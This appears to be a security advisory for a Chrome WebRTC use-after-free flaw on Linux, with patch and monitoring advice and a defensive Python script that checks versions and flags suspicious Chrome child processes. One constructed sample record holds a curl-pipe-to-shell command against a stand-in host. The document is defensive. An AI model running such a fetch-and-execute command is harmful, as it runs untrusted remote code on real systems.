CVE-2026-11074
Google · Chrome
A Use-After-Free vulnerability in the WebRTC component of Google Chrome on Linux can lead to memory corruption and potential code execution.
Executive summary
A high-severity Use-After-Free vulnerability in Google Chrome’s WebRTC implementation on Linux platforms exposes users to potential remote code execution.
Vulnerability
This vulnerability is a Use-After-Free error in the WebRTC stack that can be triggered by an unauthenticated remote attacker. Successful exploitation requires user interaction: the victim must load attacker-controlled content, such as a crafted web page, that exercises the vulnerable WebRTC code path. A freed object that is still referenced can then be reused to corrupt memory, which is the first step toward code execution in the affected process.
Business impact
With a CVSS base score of 8.8 (High), this flaw represents a significant risk to Linux-based endpoints. Unauthorized code execution could result in full system compromise, data exfiltration, or the establishment of persistence on the affected workstation. Because Chrome runs the affected code inside its process sandbox, reaching the rest of the system usually requires chaining this bug with a sandbox escape; such chains are routine in browser exploitation, so the practical risk remains high.
Remediation
Immediate Action: Deploy the latest stable release of Google Chrome (version 149 or later) to all Linux environments and confirm the installed build with google-chrome --version; an endpoint reporting a major version below 149 is still exposed.
Proactive Monitoring: Review endpoint logs for Chrome crash reports (crashpad dumps) and repeated segmentation faults in Chrome processes, since failed attempts to exploit a Use-After-Free frequently surface as crashes, particularly around WebRTC-heavy sites such as video-conferencing applications.
Compensating Controls: Use endpoint detection and response (EDR) tools to alert on child processes of Google Chrome that are not Chrome's own helpers (the chrome binary itself with a --type= argument, chrome-sandbox, chrome_crashpad_handler); a shell, interpreter, or download utility spawned by a Chrome process is a strong post-exploitation indicator.
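The remediation steps above, as an added example that is not part of this advisory or of Google's own tooling: a Python script that (1) parses a google-chrome --version banner and decides whether the build meets the version 149 minimum, and (2) applies the compensating-control logic to process-spawn records, flagging children of Chrome that are not Chrome's own helpers and treating any child of a sandboxed renderer as high severity. The install path /opt/google/chrome, the xdg-* helper paths, the key=value record format, and the sample records themselves are assumptions constructed for the example, not real telemetry.

```python
import re
import shlex
import subprocess
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Minimum fixed major version stated by the advisory.
MIN_PATCHED_MAJOR = 149
# Assumption: google-chrome-stable installed in its default Linux location.
CHROME_DIR = "/opt/google/chrome/"
# Helpers the browser process legitimately execs (e.g. opening a download).
# Assumption: paths as on a typical Debian/Ubuntu system.
BENIGN_HELPERS = {"/usr/bin/xdg-open", "/usr/bin/xdg-mime", "/usr/bin/xdg-settings"}

_VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\.(\d+)\b")


def parse_chrome_version(banner: str) -> Optional[Tuple[int, int, int, int]]:
    """Extract the four-part version from a `google-chrome --version` banner
    such as 'Google Chrome 148.0.7300.100'. Returns None if no version is found."""
    m = _VERSION_RE.search(banner)
    if m is None:
        return None
    return tuple(int(x) for x in m.groups())  # type: ignore[return-value]


def is_patched(banner: str) -> bool:
    """True if the installed major version meets the advisory's minimum."""
    v = parse_chrome_version(banner)
    return v is not None and v[0] >= MIN_PATCHED_MAJOR


def installed_chrome_banner(binary: str = "google-chrome") -> Optional[str]:
    """Run the local Chrome binary to fetch its banner; None if not installed."""
    try:
        out = subprocess.run([binary, "--version"], capture_output=True, text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return out.stdout.strip() or None


@dataclass
class Finding:
    severity: str  # "high" or "medium"
    reason: str
    event: dict


def parse_event(line: str) -> dict:
    """Parse one key=value process-exec record; shlex keeps quoted values intact."""
    fields = {}
    for tok in shlex.split(line):
        if "=" in tok:
            key, value = tok.split("=", 1)
            fields[key] = value
    return fields


def classify_spawn(ev: dict) -> Optional[Finding]:
    """Flag a child of a Chrome process that Chrome itself would not spawn."""
    parent, child = ev.get("parent_exe", ""), ev.get("exe", "")
    if not parent.startswith(CHROME_DIR):
        return None  # not a Chrome child; outside this rule's scope
    if "--type=renderer" in ev.get("parent_args", ""):
        # A sandboxed renderer has no legitimate reason to exec anything.
        return Finding("high", "renderer process spawned a child", ev)
    if child.startswith(CHROME_DIR) or child in BENIGN_HELPERS:
        return None  # gpu/utility/zygote helpers, crashpad, xdg-open, ...
    return Finding("medium", f"browser process spawned {child}", ev)


def scan(lines) -> List[Finding]:
    """Run the rule over an iterable of records, skipping blank lines."""
    return [f for f in (classify_spawn(parse_event(l)) for l in lines if l.strip()) if f is not None]


# Constructed sample records (not real telemetry); the format stands in for
# whatever the deployed EDR exports.
SAMPLE_EVENTS = [
    'ts=2026-01-10T09:12:01Z ppid=4100 parent_exe=/opt/google/chrome/chrome pid=4150 exe=/opt/google/chrome/chrome args="--type=gpu-process"',
    'ts=2026-01-10T09:12:02Z ppid=4100 parent_exe=/opt/google/chrome/chrome pid=4151 exe=/opt/google/chrome/chrome_crashpad_handler args=""',
    'ts=2026-01-10T09:15:40Z ppid=4100 parent_exe=/opt/google/chrome/chrome pid=4402 exe=/usr/bin/xdg-open args="/home/u/Downloads/report.pdf"',
    'ts=2026-01-10T09:18:07Z ppid=4188 parent_exe=/opt/google/chrome/chrome parent_args="--type=renderer" pid=4510 exe=/bin/sh args="-c curl http://example.invalid/x|sh"',
    'ts=2026-01-10T09:18:09Z ppid=4100 parent_exe=/opt/google/chrome/chrome pid=4511 exe=/usr/bin/python3 args="/tmp/.p"',
    'ts=2026-01-10T09:20:00Z ppid=2001 parent_exe=/usr/bin/bash pid=4600 exe=/bin/ls args="-la"',
]


if __name__ == "__main__":
    local = installed_chrome_banner()
    for banner in [local] if local else ["Google Chrome 148.0.7300.100", "Google Chrome 149.0.7400.12"]:
        print(f"{banner!r}: patched={is_patched(banner)}")
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.reason}: pid={f.event.get('pid')} exe={f.event.get('exe')}")
```

Run on the constructed records, the script ignores Chrome's gpu-process, crashpad and xdg-open children, reports the shell spawned by a renderer as high severity and the python3 interpreter spawned by the browser process as medium, and leaves the unrelated bash/ls event alone. If google-chrome is on PATH, the version check uses the live banner instead of the constructed ones.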
Exploitation status
Public Exploit Available: false
Analyst recommendation
Organizations running Google Chrome on Linux must treat this update as critical. Update to version 149 or later immediately to close the remote code execution vector in the WebRTC component, and verify the installed version on each endpoint rather than relying on auto-update alone.